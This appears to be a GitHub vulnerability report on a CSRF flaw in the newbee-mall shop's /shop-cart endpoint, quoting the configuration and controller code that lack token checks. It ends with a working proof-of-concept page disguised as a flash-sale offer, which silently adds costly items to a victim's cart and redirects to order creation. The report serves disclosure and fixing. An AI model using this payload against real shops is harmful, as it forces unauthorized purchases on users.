CSRF Vulnerability in Shopping Cart Item Addition #110

@flashzyc

CSRF Vulnerability in Shopping Cart Item Addition

Summary

A CSRF vulnerability exists in the shopping cart addition endpoint /shop-cart (POST). Attackers can add arbitrary items to users' shopping carts, which can be chained with the order creation CSRF to force unauthorized purchases.

Vulnerability Details

Configuration-Level Issue

File: src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java

import ltd.newbee.mall.interceptor.NewBeeMallLoginInterceptor;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Configuration;
import org.springframework.web.servlet.config.annotation.InterceptorRegistry;
import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;

@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
    @Autowired private NewBeeMallLoginInterceptor newBeeMallLoginInterceptor;

    @Override
    public void addInterceptors(InterceptorRegistry registry) {
        // Only a login (session) check is applied to the cart endpoints
        registry.addInterceptor(newBeeMallLoginInterceptor)
                .addPathPatterns("/shop-cart/**");
        // ❌ No CSRF token validation configured
    }
}

Endpoint-Level Code Analysis

File: src/main/java/ltd/newbee/mall/controller/mall/ShoppingCartController.java (Lines 63-76)

@PostMapping("/shop-cart")
@ResponseBody
public Result saveNewBeeMallShoppingCartItem(@RequestBody NewBeeMallShoppingCartItem newBeeMallShoppingCartItem,
                                             HttpSession httpSession) {
    NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
    newBeeMallShoppingCartItem.setUserId(user.getUserId());
    // ❌ No CSRF token validation
    // ⚠️ Accepts JSON payload from any origin
    String saveResult = newBeeMallShoppingCartService.saveNewBeeMallCartItem(newBeeMallShoppingCartItem);
    if (ServiceResultEnum.SUCCESS.getResult().equals(saveResult)) {
        return ResultGenerator.genSuccessResult();
    }
    return ResultGenerator.genFailResult(saveResult);
}

Security Issues:

  1. ❌ No CSRF token validation
  2. ⚠️ Accepts JSON requests with credentials: include
  3. ⚠️ Can be chained with order creation for full attack

Proof of Concept (PoC)

<!DOCTYPE html>
<html>
<head>
    <title>Special Offer - Limited Time!</title>
</head>
<body>
    <h1>🎁 Flash Sale! 90% OFF</h1>
    <p>Adding special offers to your cart...</p>
    
    <script>
        // Add expensive items to victim's shopping cart
        var itemsToAdd = [
            {goodsId: 10047, goodsCount: 5},   // Expensive item 1
            {goodsId: 10048, goodsCount: 10},  // Expensive item 2
            {goodsId: 10049, goodsCount: 3}    // Expensive item 3
        ];
        
        itemsToAdd.forEach(function(item) {
            fetch('http://localhost:28089/shop-cart', {
                method: 'POST',
                credentials: 'include',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify(item)
            })
            .then(response => response.json())
            .then(data => console.log('Added item:', item.goodsId));
        });
        
        // Step 2: Redirect to order creation (chain attack)
        setTimeout(function() {
            window.location.href = 'http://localhost:28089/saveOrder';
        }, 2000);
    </script>
</body>
</html>

Impact

Unauthorized shopping cart manipulation leading to forced purchases: when combined with order creation CSRF, attackers can force users to buy unwanted expensive items.


CVSS Score: 7.6 (High)
